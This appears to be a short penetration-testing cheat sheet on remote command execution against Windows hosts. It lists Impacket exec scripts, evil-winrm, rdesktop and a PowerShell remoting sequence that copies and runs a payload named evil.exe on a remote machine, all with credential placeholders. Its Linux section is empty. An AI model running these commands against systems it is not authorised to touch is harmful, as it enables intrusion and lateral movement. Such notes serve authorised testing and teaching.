Remote Command Execution

Windows

• pyenv activate impacket
• cd examples
  • python ./atexec.py {DOMAIN}/{USER}:{PASSWORD}@{IP} {COMMAND}
  • python ./wmiexec.py {DOMAIN}/{USER}:{PASSWORD}@{IP}
  • python ./smbexec.py {DOMAIN}/{USER}:{PASSWORD}@{IP}
  • python ./psexec.py {DOMAIN}/{USER}:{PASSWORD}@{IP}
  • python ./dcomexec.py -object MMC20 {DOMAIN}/{USER}:{PASSWORD}@{IP}
• evil-winrm -u {USER} -p {PASSWORD} -i {IP}
• rdesktop -k de-ch -u '{DOMAIN}}\{USER}' -p '{PASSWORD}' {IP}
• PowerShell Session
  • $sesh = New-PSSession -Computer {HOSTNAME}
  • Invoke-Command -Session $sesh -ScriptBlock {ipconfig}
  • Copy-Item "C:\Users\Public\evil.exe" -Destination "C:\Users\Public\" -ToSession $sesh
  • Invoke-Command -Session $sesh -ScriptBlock {C:\Users\Public\whoami.exe}

Linux

Relevant Note(s):